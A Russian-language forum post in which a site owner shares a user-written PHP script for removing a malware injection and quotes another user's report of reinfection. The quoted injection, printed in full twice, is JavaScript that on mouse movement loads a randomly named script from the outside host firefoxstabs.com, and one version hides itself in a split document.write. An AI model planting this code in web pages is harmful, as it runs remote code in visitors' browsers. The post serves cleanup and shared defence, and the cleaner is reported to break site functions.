дубликат есть, сначала же локально делалось
оттуда кста и восстанавливал
вот народ наваял скриптик:
"
<?php
define ('BR', "<br />\r\n");
$srch='<script type="text/javascript" src="
https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(\'
http://firefoxstabs.com/\' + Math.random().toString().substring(3) + \'.js\', function() {flag = 2;});}});});</script>';
function clean_file($file){
global $srch;
$basename=basename($file);
$filename=substr($basename, 0, strrpos($basename, '.'));
if ($filename=='index' or $filename=='header' or $filename=='top' or $filename=='menu' or $filename=='footer' or $filename=='default') {
$f_in=file_get_contents($file);
if (strpos($f_in, $srch)!=false) {
print($file.BR);
$f_in=str_replace($srch, '', $f_in);
file_put_contents($file, $f_in);
}
}
}
function firefoxtabs_remover($dir){
if ($objs = glob($dir."/*")) {
foreach($objs as $obj) {
if (is_dir($obj)) firefoxtabs_remover($obj);
else clean_file($obj);
}
}
}
$dir=realpath('./');
firefoxtabs_remover($dir);
?>
код ищет файлы от корня с именами
index
menu
header
top
footer
default
в них ищет вредоносный код и удаляет его"
но так как не кодер, рекомендовать его не могу, сам не тестил
вот что народ еще пишет:
"Что то после чистки скриптом у меня отваливаются bbcodes и еще не могу залогинеться. Чистил кэш на сайте и в браузере. После чистки скриптом в админке автоматом переключается на функцию сжатие js файлов принудительно.
Короче, заипал этот вирус. Уже надоело перезаливать файлы. В ручную
alextrish добавил 16.05.2011 в 05:39
Сейчас пробежался по шаблонам, короче в шаблоне в папке js во всех файлах js появилось уже такое:
Цитата:
document.write('<scr'+'ipt src="
https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('
http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});
"
у меня пока, что внешних признаков нет, после чистки
но посмотрим, что будет через день-другой